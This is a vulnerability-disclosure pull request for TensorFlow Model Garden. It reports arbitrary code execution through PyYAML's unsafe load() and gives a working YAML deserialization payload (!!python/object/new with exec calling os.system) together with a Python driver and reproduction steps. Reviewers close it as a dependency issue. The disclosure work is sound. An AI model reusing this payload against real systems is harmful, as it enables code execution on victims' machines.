### PR TITLE
Arbitrary Code Execution in Tensorflow/models

### PR DESCRIPTION
**Pull request by B3EF**
# Description
**Arbitrary Code Excecution** in Tensorflow/Models.The TensorFlow Model Garden is a repository with a number of different implementations of state-of-the-art (SOTA) models and modeling solutions for TensorFlow users. We aim to demonstrate the best practices for modeling so that TensorFlow users can take full advantage of TensorFlow for their research and product development
# Technical Description
This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function **load()** in **pyyaml**
# Exploit code
**Python File**
```python
import params_dict
exploit = params_dict.read_yaml_to_params_dict('exploit.yml')
print(exploit)
```
**YAML File**
```yml
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
```
# POC
* place the exploit codes **models/official/modeling/hyperparams**
* Run the python code 

## 💥 Impact
code execution
## ✅ Checklist
- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Review by b1nslashsh — APPROVED** [review]

**Comment by adam-nygate** [comment]
@B3EF this also looks like an issue in `pyyaml` and not `tensorflow/model`

**Comment by adam-nygate** [comment]
@B3EF this seems like an issue in a known vulnerable dependency of the project, rather than a vulnerability in the project itself. Closing for now, but please let me know if you feel differently.
